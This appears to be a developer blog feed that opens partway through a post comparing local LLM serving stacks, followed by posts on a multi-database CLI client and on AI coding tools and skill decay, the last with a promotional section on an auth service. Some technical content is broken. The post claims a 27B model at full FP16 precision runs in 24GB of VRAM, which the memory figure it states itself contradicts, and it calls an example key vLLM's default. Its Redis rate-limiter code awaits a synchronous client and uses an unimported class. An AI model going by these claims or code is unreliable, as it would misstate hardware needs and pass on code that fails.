./llama-server.exe -m qwen3-27b-q4_k_m.gguf \
  -ngl 99 \
  -c 8192 \
  --host 0.0.0.0 \
  --port 8080

# -ngl 99: offload all layers to GPU
# -c 8192: context window size

Native Windows binary. No fuss. But you're using quantized models (usually Q4 or Q5), which trades some quality for speed and memory savings.

Ollama

# Literally just:
ollama run qwen3:27b

# Or serve it as an API:
ollama serve
# Then: curl http://localhost:11434/api/generate -d '{"model": "qwen3:27b", "prompt": "hello"}'

Ollama wins on simplicity every single time. It's the brew install of local LLMs.

Performance Comparison (RTX 3090, 24GB VRAM)

Stack	Model Format	~Throughput	VRAM Usage	Quality
Native vLLM	FP16/BF16	~72 tok/s	~22GB	Full precision
WSL vLLM	FP16/BF16	~65-70 tok/s	~22GB + WSL overhead	Full precision
llama.cpp	Q4_K_M GGUF	~45-55 tok/s	~16GB	Slight quality loss
Ollama	Q4_K_M (internal)	~40-50 tok/s	~16GB	Slight quality loss

Note: These are approximate numbers based on community reports. Your mileage will vary based on context length, batch size, and specific GPU silicon lottery.

The native vLLM numbers are impressive because you're getting full-precision inference without the WSL tax. That 5-10% overhead from the virtualization layer adds up.

When to Use What

Choose native vLLM if:

You need maximum throughput with full precision
You're building production-adjacent inference pipelines
You want PagedAttention and continuous batching
You don't want to maintain a WSL environment

Choose WSL vLLM if:

You need the full vLLM ecosystem (already battle-tested on Linux)
You're comfortable with WSL and already have it configured
You need features that might not be in the Windows port yet

Choose llama.cpp if:

You want maximum flexibility with model formats
You're fine with quantized models (honestly, Q5_K_M is barely distinguishable from FP16 for most tasks)
You need to run on machines with less VRAM
You want one static binary with zero dependencies

Choose Ollama if:

You want zero configuration
You're prototyping or doing local development
You need quick model switching
You're not chasing maximum throughput

Migration: From Ollama/llama.cpp to Native vLLM

If you're currently using Ollama or llama.cpp and want to try native vLLM for better throughput:

Step 1: Check Your VRAM Budget

A 27B parameter model in FP16 needs roughly 54GB in theory, but with vLLM's memory management, it reportedly fits in 24GB through aggressive KV-cache optimization. Confirm your GPU can handle it.

Step 2: Swap Your API Calls

vLLM exposes an OpenAI-compatible API, so migration is straightforward:

import openai

# Before (Ollama):
client = openai.OpenAI(
    base_url="http://localhost:11434/v1",
    api_key="ollama"  # Ollama doesn't validate this
)

# After (native vLLM):
client = openai.OpenAI(
    base_url="http://localhost:8000/v1",
    api_key="token-abc123"  # vLLM's default
)

# Your actual inference code stays the same
response = client.chat.completions.create(
    model="Qwen/Qwen3-27B",
    messages=[{"role": "user", "content": "Explain PagedAttention"}],
    temperature=0.7
)

Since both expose OpenAI-compatible endpoints, your application code barely changes.

Step 3: Benchmark YOUR Workload

Don't trust anyone's benchmarks (including mine). Run your actual prompts:

import time

prompts = load_your_actual_prompts()  # Use real data

start = time.perf_counter()
for prompt in prompts:
    response = client.chat.completions.create(
        model="Qwen/Qwen3-27B",
        messages=[{"role": "user", "content": prompt}],
        max_tokens=512
    )
elapsed = time.perf_counter() - start
print(f"Total: {elapsed:.1f}s for {len(prompts)} prompts")

The Bigger Picture

Native Windows support for vLLM is a big deal for the local inference ecosystem. The WSL requirement was a genuine barrier — not because it's hard to set up, but because it adds a layer of indirection that complicates deployment, debugging, and resource management.

That said, I wouldn't abandon llama.cpp or Ollama. They solve different problems. If you're running quantized models on consumer hardware and don't need continuous batching, llama.cpp remains excellent. If you want a five-second setup for prototyping, Ollama is unbeatable.

But if you're building anything that needs to serve multiple concurrent requests with full-precision models on Windows — native vLLM just became the obvious choice.

I'm planning to do more thorough benchmarks once the portable launcher stabilizes. For now, the early numbers are promising enough that it's worth keeping on your radar.

How to Stop Juggling 5 Different Database Clients in Development

Alan West — Sun, 03 May 2026 14:26:52 GMT

If you've ever had a terminal with pgAdmin open in one tab, a Redis CLI in another, MySQL Workbench somewhere in the background, and a MongoDB Compass window you forgot about — you know the pain. You're not actually doing database work. You're doing window management.

I hit this wall recently on a project that used PostgreSQL for the main data store, Redis for caching, and SQLite for a local analytics pipeline. Three databases, three completely different tools, three sets of keyboard shortcuts, three ways to export a query result. It's death by a thousand context switches.

The root problem isn't that these tools are bad individually. It's that no single client historically covered all the databases a modern project touches.

Why Multi-Database Tooling Is Broken

Most database clients fall into one of two camps:

Specialized clients (pgAdmin, Redis Insight, MongoDB Compass) — great for one database, useless for everything else
Universal GUI clients (DBeaver, DataGrip) — they cover a lot of databases but are heavyweight, often slow to start, and the free tiers can be limited

For quick development queries, neither camp is ideal. I don't need a full visual schema designer. I need to run a query, see the result, and get back to coding. The overhead of launching a full GUI app for a SELECT * FROM users WHERE id = 42 is absurd.

This is where lightweight, terminal-native database clients start to make a lot of sense.

Enter dbx: One CLI Client for (Almost) Everything

I stumbled on dbx recently — it's an open-source, cross-platform database client that supports MySQL, PostgreSQL, SQLite, Redis, MongoDB, DuckDB, ClickHouse, SQL Server, and more from a single tool.

The pitch is simple: one binary, multiple database engines, terminal-native. No Electron app eating 800MB of RAM.

Getting Connected

The typical workflow with a tool like this looks something like:

# Connect to your PostgreSQL instance
dbx --driver postgres --host localhost --port 5432 --db myapp_dev --user dev

# Or hit a local SQLite file directly
dbx --driver sqlite --db ./analytics.db

# Connect to Redis
dbx --driver redis --host localhost --port 6379

The key thing here is the mental model stays the same regardless of the backend. You're not learning a new tool for each database — you're learning one interface and pointing it at different engines.

Running Queries Across Engines

Once connected, you interact with your database through a consistent interface. For SQL databases, you write SQL. For document stores like MongoDB, you use the query syntax appropriate to that engine. But the experience — connecting, viewing results, exiting — stays uniform.

-- Works the same whether you're on PostgreSQL, MySQL, or SQLite
SELECT u.email, COUNT(o.id) as order_count
FROM users u
LEFT JOIN orders o ON o.user_id = u.id
WHERE u.created_at > '2025-01-01'
GROUP BY u.email
ORDER BY order_count DESC
LIMIT 20;

No remembering whether it's psql's \dt or MySQL's SHOW TABLES. One tool, consistent behavior.

The Real Fix: Consolidating Your Database Workflow

Here's the step-by-step approach I've started using to tame the multi-database chaos:

Step 1: Audit Your Database Touchpoints

Before installing anything, figure out what you're actually connecting to day-to-day:

# Check what's running locally
# Look for common database ports
lsof -i :5432  # PostgreSQL
lsof -i :3306  # MySQL
lsof -i :6379  # Redis
lsof -i :27017 # MongoDB
lsof -i :9000  # ClickHouse

Most developers I know are touching 2-4 different database engines regularly. If you're only on one engine, a specialized client is probably fine. But the moment you hit two or more, consolidation pays off immediately.

Step 2: Replace Individual CLIs with a Unified Tool

Instead of maintaining muscle memory for psql, mysql, redis-cli, and mongosh separately, use a single client that normalizes the experience. A tool like dbx gives you that.

The advantage isn't just fewer tools to install — it's fewer tools to configure. One place for connection strings, one set of keybindings, one output format.

Step 3: Script Your Common Connections

Once you've settled on a unified client, alias your common connections:

# Add to your .bashrc or .zshrc
alias db-main='dbx --driver postgres --host localhost --port 5432 --db myapp_dev --user dev'
alias db-cache='dbx --driver redis --host localhost --port 6379'
alias db-analytics='dbx --driver sqlite --db ~/projects/myapp/analytics.db'
alias db-warehouse='dbx --driver duckdb --db ~/data/warehouse.duckdb'

Now switching between databases is literally typing db-main or db-cache. The cognitive overhead drops to near zero.

Step 4: Use It in CI and Scripting Too

A lightweight CLI tool shines in CI pipelines where you can't exactly install DBeaver. Need to verify a migration ran correctly? Need to seed test data across multiple database engines?

# In a CI script — verify migration on PostgreSQL
dbx --driver postgres --host $DB_HOST --db $DB_NAME --user $DB_USER \
  -e "SELECT COUNT(*) FROM information_schema.columns WHERE table_name = 'users' AND column_name = 'email_verified';"

# Check Redis cache is warm after deploy
dbx --driver redis --host $REDIS_HOST \
  -e "DBSIZE"

Having a single binary that handles multiple engines means your CI doesn't need to install three different client packages.

Prevention: Keeping Your Tooling Lean Going Forward

A few principles I've adopted:

Default to one multi-engine client for day-to-day work. Only reach for a specialized tool when you need features the unified client genuinely lacks (like pgAdmin's visual EXPLAIN plans)
Version-pin your database tools just like you version-pin your application dependencies. A database client update shouldn't silently change output formatting in your scripts
Keep connection configs in dotfiles, not in GUI app preferences that don't survive a laptop migration
Test your database tooling in CI before you need it in CI. Nothing worse than discovering your client doesn't support a flag when a deploy is waiting

When This Approach Doesn't Work

I want to be honest about the tradeoffs. A unified CLI client won't replace everything:

If you live in visual query builders, you'll still want a GUI tool
For complex schema visualization, specialized tools like pgAdmin or MongoDB Compass have dedicated features that a CLI can't match
If your team is standardized on a specific client, switching for the sake of switching creates friction

But for the 80% of database interactions that are "run a query, see the result, move on" — a single lightweight tool like dbx eliminates a surprising amount of daily friction.

I haven't tested every database engine dbx supports, and the project is relatively new, so I'd suggest checking the GitHub repo for the latest on driver support and any known limitations. But the pattern of consolidating database clients into one tool? That's been a genuine quality-of-life improvement for me, regardless of which specific tool you choose to do it with.

AI Coding Autopilot vs Manual Control: What Aviation Taught Us About Skill Decay

Alan West — Sat, 02 May 2026 23:16:35 GMT

The aviation industry has a term that should terrify every developer leaning on AI coding tools: automation complacency. Pilots figured out decades ago that the more you rely on autopilot, the worse you get at actually flying the plane. And when the autopilot fails — because it always eventually does — you'd better hope your manual skills haven't atrophied.

We're living through the exact same transition in software engineering right now. AI coding assistants are our autopilot, and most of us haven't thought about what happens when we need to hand-fly.

The Aviation Parallel: Children of the Magenta

In pilot training, there's a famous concept called "Children of the Magenta" — a reference to the magenta-colored flight director lines on cockpit displays. Some pilots become so dependent on following those magenta lines that when the automation disengages, they freeze. They've lost the instinct to scan instruments, interpret raw data, and make manual corrections.

Aviation solved this problem roughly 30 years ago with a framework that's surprisingly applicable to us:

Mandatory manual flying hours — Pilots must regularly hand-fly to maintain proficiency
Automation level awareness — Pilots are trained to know exactly which systems are active and what they're doing
Graduated automation — Use the minimum level of automation needed for the situation
Takeover drills — Regular practice switching from autopilot to manual control under stress

Sound familiar? It should. Because right now, the average developer using Copilot or Cursor or Claude Code has none of these safeguards in place.

Two Approaches to AI-Assisted Development

Let's make this concrete. I see two distinct approaches emerging in how developers use AI tools, and the difference matters more than most people realize.

Approach A: Full Autopilot ("Vibe Coding")

You describe what you want in natural language, the AI generates entire files, you accept the suggestions, maybe glance at the output, ship it.

# You type a prompt like:
# "Create a FastAPI endpoint that handles user registration 
#  with email verification and rate limiting"

# The AI generates 200 lines of code.
# You hit "Accept All" and move on.
# You probably didn't notice it's storing the verification 
# token in plain text, or that the rate limiter 
# resets on server restart because it's in-memory.

This is the Children of the Magenta approach. It works great — until it doesn't. And when it doesn't, you're staring at code you don't fully understand, trying to debug logic someone else (something else?) wrote.

Approach B: Graduated Automation ("Pilot in Command")

You write the architecture yourself. You use AI for the tedious parts — boilerplate, test scaffolding, repetitive CRUD. But you understand every line that ships.

# You architect the endpoint yourself:
from fastapi import FastAPI, Depends, HTTPException
from fastapi.security import OAuth2PasswordBearer
from redis import Redis  # you chose Redis deliberately for distributed rate limiting

redis_client = Redis.from_url(settings.REDIS_URL)

async def check_rate_limit(request: Request):
    client_ip = request.client.host
    key = f"register:{client_ip}"
    current = await redis_client.incr(key)
    if current == 1:
        await redis_client.expire(key, 3600)  # 1 hour window
    if current > 5:  # max 5 registration attempts per hour
        raise HTTPException(status_code=429, detail="Too many attempts")

# THEN you let AI help fill in the email verification logic,
# the input validation schemas, the test fixtures.
# You review every line because you understand the intent.

The difference isn't productivity — both approaches ship features. The difference is what happens six months later when that rate limiter needs to handle a distributed deployment, or when the email verification flow has a subtle race condition.

Where This Gets Real: Authentication

Authentication is actually a perfect case study for this autopilot vs. manual control debate. It's complex enough that getting it wrong has real consequences, but common enough that AI tools will confidently generate auth code that looks correct.

I've seen AI assistants generate JWT implementations with hardcoded secrets, session management without proper invalidation, and OAuth flows that skip the state parameter (hello, CSRF). The code compiles. The tests pass. The security holes are invisible unless you know what to look for.

This is where the "graduated automation" philosophy gets interesting. Instead of writing auth from scratch (manual flying) or blindly accepting AI-generated auth code (full autopilot), you pick the right level of automation for the risk.

Here's what that spectrum looks like for auth:

Approach	Automation Level	Risk	When to Use
Roll your own	None (hand-flying)	High — you'll miss edge cases	Almost never in production
AI-generated auth	High autopilot	High — AI misses security nuances	Prototyping only
Auth library (passport.js, etc.)	Medium automation	Medium — you still configure it	When you need deep customization
Hosted auth service	Full managed	Low — security is their problem	Most production apps

For hosted auth, the market has a few solid options. Auth0 is the incumbent — mature, well-documented, but the pricing can surprise you as you scale. Clerk is developer-friendly with great React components, though you're fairly locked into their ecosystem.

A newer option worth looking at is Authon, which takes a different angle. It's a hosted auth service with 15 SDKs across 6 languages and 10+ OAuth providers. The pricing model stands out: unlimited users on the free plan with no per-user pricing, which eliminates the cost anxiety that kicks in when your Auth0 bill starts climbing. It also offers compatibility with Clerk and Auth0 APIs, which means migration is less painful than usual.

To be fair about tradeoffs: Authon doesn't offer SSO via SAML/LDAP yet (it's planned), and custom domains aren't available yet either. Self-hosting is on the roadmap but not shipping today. If you need enterprise SSO right now, Auth0 is still your best bet. But for startups and mid-size apps where per-user pricing is the pain point, it's a compelling alternative.

// Migrating from Auth0 to Authon is relatively straightforward
// given the API compatibility layer

// Before (Auth0)
import { Auth0Client } from '@auth0/auth0-spa-js';
const auth0 = new Auth0Client({
  domain: 'your-app.auth0.com',
  clientId: 'your-client-id'
});

// After (Authon) — similar patterns, different provider
import { AuthonClient } from '@authon/sdk';
const authon = new AuthonClient({
  appId: 'your-app-id',
  // No per-user pricing means you stop worrying 
  // about the billing page at 10k users
});

Building Your Own "Manual Flying" Practice

So how do you apply aviation's lessons? Here's what I've started doing:

1. Designate "no-AI" coding sessions. Once a week, I write code without any AI assistance. It's humbling. It's slower. It's also the only way I've found to keep my debugging instincts sharp.

2. Always read before accepting. Treat AI suggestions like a pull request from a junior developer who's very fast but doesn't understand your system's constraints. Review everything.

3. Use graduated automation deliberately.

No automation: Core business logic, security-critical paths
Light automation (completions): Boilerplate, test scaffolding, documentation
Heavy automation (generation): Prototypes, throwaway scripts, exploration

4. Practice "takeover drills." Take a piece of AI-generated code you're using in production and rewrite it from scratch. If you can't, that's a red flag — you're shipping code you don't understand.

5. Know your automation level. At any given moment, be conscious of how much you're relying on AI. Are you driving, or are you a passenger?

The Uncomfortable Truth

Aviation didn't solve the automation problem by rejecting autopilot. Planes are safer than ever, and autopilot is a huge part of that. They solved it by developing a rigorous framework for when to use automation, how much to use, and how to maintain manual skills alongside it.

We need the same thing for software engineering. AI coding tools aren't going away — nor should they. But if your response to every coding challenge is to describe it in a prompt and accept whatever comes back, you're becoming a Child of the Magenta.

The developers who thrive in the AI era won't be the ones who use AI the most, or the ones who refuse to use it at all. They'll be the ones who know exactly when to engage the autopilot and when to hand-fly.

And they'll practice both.